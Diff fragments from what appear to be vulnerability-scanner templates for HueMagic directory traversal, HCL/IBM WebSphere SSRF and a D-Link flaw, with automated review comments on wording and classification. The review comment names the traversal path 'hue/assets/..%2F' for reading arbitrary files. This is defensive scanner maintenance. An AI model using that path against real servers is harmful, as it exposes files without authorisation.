- https://github.com/Foddy/node-red-contrib-huemagic/issues/217
- https://www.cvedetails.com/cve/CVE-2021-25864
- https://nvd.nist.gov/vuln/detail/CVE-2021-25864
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
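Review bot: renaming "Directory Traversal" to "Local File Inclusion" mislabels the issue: the removed description says `res.sendFile` in hue-magic.js is used to fetch an arbitrary file via `hue/assets/..%2F`, which is path traversal leading to arbitrary file read (the file is returned, not executed). The rewrite also drops the package name `node-red-contrib-huemagic`, which is what users will actually search for. Suggest "node-red-contrib-huemagic 3.0.0 (Hue Magic) is susceptible to directory traversal in the res.sendFile call in hue-magic.js, allowing arbitrary files to be read."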
@ -32,3 +32,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/06/27

@ -1,14 +1,15 @@
id: CVE-2021-27748
info:
name: IBM WebSphere Portal SSRF
name: IBM WebSphere HCL Digital Experience - Server-Side Request Forgery
author: pdteam
severity: high
description: |
A Server Side Request Forgery vulnerability affects HCL Digital Experience, on-premise deployments and containers.
IBM WebSphere HCL Digital Experience is susceptible to server-side request forgery vulnerability that impacts on-premise deployments and containers.
reference:
- https://blog.assetnote.io/2021/12/26/chained-ssrf-websphere/
- https://support.hcltechsw.com/csm?id=kb_article&sysparm_article=KB0095665
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27748
classification:
cve-id: CVE-2021-27748
metadata:
@ -27,6 +28,7 @@ requests:
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
words:
- "Interactsh Server"
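Review bot: "is susceptible to server-side request forgery vulnerability" is missing an article ("a server-side request forgery vulnerability"). The new name "IBM WebSphere HCL Digital Experience" also fuses two product names; the old name "IBM WebSphere Portal" and the HCL references describe the same product under its old and new branding, so "HCL Digital Experience (IBM WebSphere Portal) - Server-Side Request Forgery" keeps both searchable.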

@ -9,7 +9,6 @@ info:
- https://nvd.nist.gov/vuln/detail/CVE-2021-46379
- https://drive.google.com/file/d/1rrlwnIxSHEoO4SMAHRPKZSRzK5MwZQRf/view
- https://www.dlink.com/en/security-bulletin
- https://www.dlink.com/en/security-bulletin/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1